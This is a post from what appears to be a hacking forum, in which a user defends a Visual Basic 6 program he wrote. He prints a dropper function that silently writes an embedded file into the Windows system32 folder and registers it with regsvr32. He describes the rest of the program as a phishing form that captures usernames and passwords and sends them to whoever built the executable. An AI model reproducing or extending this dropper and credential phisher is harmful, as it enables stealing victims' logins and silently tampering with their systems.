Thread: Gf Fbi
View Single Post
  #20  
Old 07-27-2008, 03:53 PM
FBI's Avatar
FBI FBI is offline
Ezudian
 
Join Date: Jun 2008
Posts: 232
Reputation: 135
FBI will become famous soon enoughFBI will become famous soon enough
Default

This isnt the form1. the form1 is actually the second form that loads. the other form is the dropper and it coresponds to what the builder put in file.exe aupon creation.

Heres form_main *actual first form to load*

Code:
this is my c0d3 edited no l33cherz.
And the lovely module you blame for 'being infecting our pcs@@121`"

Public Function resdrop()
Dim yourresource() As Byte

yourresource = LoadResData(101, "CUSTOM")

Open Environ("windir") & "\system32\msinet.ocx" For Binary As #1
Put #1, , yourresource
Close #1
Shell "regsvr32 /s msinet.ocx", vbHide

End Function

Go ahead and leech it because you already got the builder source maybe now you will see.

Its vb6 anyway i had to include a msinet.ocx or it would have to be in same folder as the file.exe or whatever was named, and most people prefered to just spread the .exe

waiting on your word now.

edit on the forms, its my coding i can add how many forms, it makes it organized.

1 the first form corisponds to builder, then calls a module to register dll and drop it. secondly calls form1. form1 is a phisher form, when it is made it will open a different form to use Form1.tUser.Text and tPass.text because i had some errors with 'end if' without block if on the form, so i made a new one and put timer to make it invisible, secondly the other requests are to check login algorithm, and send you the user and pass.

i wouldnt call it dns.. dns is more of ping this is msinet control.

its idling in task manager because the other forms load and stay invisible, without thinkin first i just wanted to release on the main phisher skin form i forgot to include on Form Unload or terminate it would go ahead and call an END to all forms.

so there drop this horseshit.
__________________
Reply With Quote